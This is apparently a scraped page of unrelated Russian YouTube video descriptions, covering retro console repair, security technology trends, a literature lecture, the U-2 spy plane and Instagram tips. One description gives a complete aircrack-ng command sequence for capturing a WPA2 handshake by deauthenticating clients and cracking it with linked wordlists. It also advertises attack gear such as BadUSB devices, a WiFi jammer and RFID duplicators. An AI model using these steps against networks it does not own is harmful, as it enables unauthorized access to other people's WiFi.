Ставим Windows 95 на 486
причины неработоспособности звука, как ISAшного так и PCIного выяснины и подкреплены экспериментом.
16-bits.ru
Восстановление картриджей DENDY - Замена капли - 8bitный стародел #015
#Восстановление #Замена #капли
основатель REPLYCONT — vk.com/replycont
Пишите комментарии, я буду очень рад!
флюс NC-559 — megabonus.com/y/TCPGw
лопатка — megabonus.com/y/6B5NI
VK — vk.com/itkrock
Instagram — www.instagram.com/10poison
Twitter — twitter.com/Poison__C
Facebook — www.facebook.com/10poison
ASK — ask.fm/krock10
YouTUBE — www.youtube.com/c/itConsoler
Магазин Retr0stuff — vk.com/retr0stuff
Магазин ОДЕЖДЫ — poisonc.myprintbar.ru
(магазин одежды от Consoleщика! возможно изготовление принтов под заказ, отправка ХОТЬ куда (стоимость доставки уточняйте в VK)
это молодой канал и требует много усилий для развития, если вам понравилось данное видео, буду рад вашим лайкам и подписке
на канал!
материальная поддержка канала так же приветствуется:
Донейт — www.donationalerts.ru/r/poisoncorpse
ЯMoney — money.yandex.ru/to/410012070304208
Webmoney USD — Z390909593537
Webmoney RUB — R271840957595
Какие технологии кибербезопасности будут актуальны в среднесрочной перспективе
Прошло то время, когда вся система информационной безопасности на предприятии ограничивалась антивирусами на рабочих станциях и межсетевыми экранами на периметре. Сегодня, по оценкам экспертов, свыше 50% предприятий использует от 6 до 50 различных средств защиты. Как разобраться в том, что действительно важно, а что является обычным маркетинговым шлаком? Как понять, какие технологии нужно внедрять уже сейчас, а какие можно отложить до лучших времен? Обзору новых технологий (EDR,UEBA, NTA, NFT, CASB и др.) и посвящена данная презентация, в которой рассматриваются следующие вопросы:
— Как строилась система защиты еще совсем недавно?
— Почему прежняя парадигма системы защиты уже не работает?
— Как строить систему защиту с учетом текущих и среднесрочных тенденций?
— Что такое Use Case и какие они бывают?
— Какие технологии ИБ будут востребованы в ближайшее время и что они умеют делать (EDR, MDR, CASB, UEBA, NTA, NFT/EFT, TI, TVM, SIR, SIEM, Deception, Advanced Analytics, EPP, NGIPS, Browser Isolation, Microsegmentation, SDP, Container Security, Attack Simulation, SOAR и др.)?
Подписаться на канал Cisco: bit.ly/L1TDRt
Открытый урок с Дмитрием Быковым. "Евгений Онегин", как неоконченный роман
Программа «Открытый урок с Дмитрием Быковым» — смотрите только на RTVi.
«Евгений Онегин», как неоконченный роман.
Все лекции Дмитрия Быкова Вы можете найти на сайте rtvi.com и на нашем YouTube-канале.
Lockheed U-2 | Великий папарацци
Lockheed U-2 «Dragon Lady» — реактивный высотный разведывательный самолет, разработанный компанией Lockheed в 1950-хх.
Самолет был создан для выполнения наблюдательных полетов в любом регионе мира даже при условии активного противодействия ПВО. Основой его концепции является высотность полетов — более 70000 футов или 21 км, недостижимая для самолетов и артиллерии того времени. Самолет активно эксплуатировался силами ЦРУ и ВВС США до 1970-хх, а далее, ВВС США.
За весь приод экслпуатации U-2 принимал участие в, практически, всех военных операциях ВС США и спецвойск, а так же, проводил разведывательные миссии во всех регионах, включая СССР и КНР. В условиях гонки вооружений, силы ПВО, периодически, «догоняли» высотный разведчик и им удавалось его сбить. Наиболее известным таким случаем было сбитие U-2 с пилотом Фрэнсисом Гэри Пауэрсом в 1960 году. Однако, не смотря на все сложности и скандалы, U-2 продолжают службу до сих пор.
Приятного просмотра!
Подписывайтесь на канал, комментируйте, ставьте лайк!
Наша группа ВК: vk.com/club123681709
Инстаграм: www.instagram.com/karen_skyships
Вступайте в Air Public — одну из самых активных страниц, посвященных авиации Вконтакте: vk.com/air_public
Manjaro Linux. Немного о играх
Донат: www.donationalerts.ru/r/sirtriimeni
Шпаргалка тут:
yadi.sk/d/Y3lRGPwVX5qOhA
Магазин игр:
www.gog.com
Форум РУ:
manjaro.ru/
{100%} Как взломать любой WiFi? | WPA2 | Kali Linux | Как защититься от взлома? | UnderMind
✓ Наш канал в Телеграме: durov.cc/under_public
● ali.pub/35zes7 — Недорогой хакерский смартфон поддерживающий Kali Linux
● youtu.be/ZJ0StG_o9yI — Лучший генератор словарей для брута
● В этом ролике я покажу, что ни одну WiFi сеть нельзя считать защищенной. Так как проверка моей сети показала то, что доступ к сети может получить кто угодно. В этом ролике я покажу, как я это сделал.
● Это постановочный ролик, не имеющий никакого отношения к реальной жизни. Всё происходящее в ролике — выполнено используя средства монтажа. Всё происходящее в ролике — творческая выдумка автора. Все действия придуманы, а любые наименования ПО — вымышленны. Любые сходства с реальностью — не более чем случайность. В реальной же жизни, любые подобные действия строго запрещены! Исключением является цель проверки системы на безопасность, получив одобрение владельца сети.
● Снял продолжение: брутфорс со скоростью до 500 000 тыс паролей в секунду используя видеокарту: goo.gl/HbDh8i
● Порядок команд:
— ifconfig
— airmon-ng check kill
— airmon-ng start wlan0
— airodump-ng wlan0mon
— airodump-ng --bssid [MAC адрес точки доступа – без скобок!] --channel 1 -w wifi wlan0mon
— aireplay-ng --deauth 20 -a [MAC точки доступа] -c [MAC подключенного клиента] wlan0mon
— wpaclean ИмяНовогоФайла ИмяСтарогоФайла
— aircrack-ng -w [ПутьКСловарю] -b [MAC точки доступа] [ЧистыйХэндшейк .cap]
● Набор словарей:
— goo.gl/z7mnhf — Даты, использовать первым
— goo.gl/4BBPQy — Номера Телефонов RUS, использовать вторым
— goo.gl/bVsfo2 — Элитный словарь от InsidePRO
— goo.gl/Ab2fTE — Дополнительный словарь на 9 млн. слов
— ● Помочь каналу и получить помощь в любых вопросах: donationalerts.com/r/undermind
● Стать спонсором канала: youtube.com/TheUnderMind/join
● Я ВКонтакте: vk.com/TheUnderMind
● Реклама на канале: bit.ly/2THIswk
— ✓ Наш сайт: darksploit.su
✓ Наш второй канал: vk.cc/9Nuba7
✓ Паблик в ВК: vk.cc/aby9hC
✓ Чат в ВК: vk.cc/abxUPr
✓ Паблик в Телеграме: durov.cc/under_public
✓ Чат в Телеграме: durov.cc/UnderChats
— ● Лучшие товары для xaЦkера:
✓ Мой хаЦкepcкий смартфон для Kali Linux (Nethunter и поддержкой правильного ядра) — ali.pub/35zes7
✓ Alfa — Лучший WiFi Адаптер (работает в Kali Linux и Nethunter): goo.gl/sv7Vuf
✓ ХаЦкерские часы-деаутентификатор с WiFi: ali.pub/4hhw62
✓ НасkRF Оnе — лучший SDR: ali.pub/4hhwsm
✓ Маленькая Bluetooth-клавиатура с подсветкой: ali.pub/4hhwwp
✓ USB порт для вашего смартфона (OTG Micro USB): goo.gl/H7pLVT
✓ WiFi Jаmmеr на ESP8266 (Глушилка-Деавторизатор WiFi): goo.gl/i7VHWP
✓ Злo Кaбель (BadUSB): ali.pub/4hhyo3
✓ Raspberry PI 3 B (можно сделать xaцk-станцию): ali.pub/4hhwzt
✓ Ruby Ducky BadUSB (XaЦkepcкий девайс в виде флешки): ali.pub/4hhxn5
✓ USB to Ethernet адаптер: ali.pub/4hhxux
✓ Разветвитель USB порта 1 в 4: goo.gl/pBoQPW
✓ Дубликатор RFID ключей и карт: goo.gl/snvemZ
✓ Дубликатор RFID / NFC, редактор кодов: ali.pub/4hhy1q
✓ Недорогие, но очень мощные рации: goo.gl/dKibg5
✓ Недорогой, но мощный WiFi адаптер: goo.gl/c5eWga
✓ Микро камера: ali.pub/4hhy49
✓ Клавиатуры с подсветкой для ПК: ali.pub/4hhyav
✓ Коврик для мыши с подсветкой: ali.pub/4hhycm
— ● В ролике "{100%} Как взломать любой WiFi? | WPA2 | Kali Linux | Как защититься от взлома? | UnderMind" — я рассказываю об информационной безопасности. И о реальной уязвимости всех сетей. Существует множество способов получения доступа к сети WiFi, в том числе социальная инженерия или уязвимости в WPS, но об этом как-нибудь в другой раз. И сейчас поговорим о самом надежном (на мой взгляд) методе, который сработает со 100% вероятностью.
● Сама проверка у нас подразделяется на 2 части. Первая: это захват хендшейка или рукопожатия. В понятии WiFi сетей это что-то вроде «Привет, чувак. Подключи меня», «Привет. Какой пароль?», «Пароль: Блаблабла». Мы прослушиваем эти данные, но поскольку пароль передается в зашифрованном виде, мы переходим ко второму этапу. А именно: к расшифровке хендшейка.
Всё делать мы будем на Kali Linux.
Первой командой смотрим интерфейс нашего WiFi адаптера
ifconfig
Выбираем тот, который отвечает за WiFi, это как правило самый последний.
Переводим наш WiFi адаптер в режим монитора. В этом режиме он будет ловить все пакеты WiFi, даже предназначенные другим устройствам. Делаем это командой:
Продолжение в ролике…
● Дополнительные хештеги:
#взлом #wifi #вайфай #хак #hack #vk #взломать #kali #linux #under #андер #undermind
Как разгоняют ФСБ: показания чекиста. Часть 1
Как сотрудник ФСБ, участвовавший в расследовании уголовных дел в отношении высокопоставленных сотрудников РЖД, сам оказался фигурантом уголовного дела
как поднять охваты stories в Instagram? | советы
Подписывайтесь на меня в Instagram: www.instagram.com/macifiqa/
Мой канал в Telegram: t.me/macifiqa
Группа VK: vk.com/malikovamadina
FAQ:
Как меня зовут?
— МАДИНА МАЛИКОВА
Сколько мне лет?
— 21 ГОД
Откуда я?
— Я С КАЗАХСТАНА, ГОРОД АЛМАТЫ
Кто я по национальности?
— КАЗАШКА
Где я учусь?
— ZHEJIANG UNIVERSITY INTERNATIONAL CAMPUS В ГОРОДЕ ХАЙНИНЬ, КИТАЙ
На что я снимаю статичные видое?
— CANON 700D
На что я снимаю влоги?
— DJI Osmo Pocket
В какой программе я монтирую?
— FINAL CUT PRO X
СОТРУДНИЧЕСТВО: macifiqa@gmail.com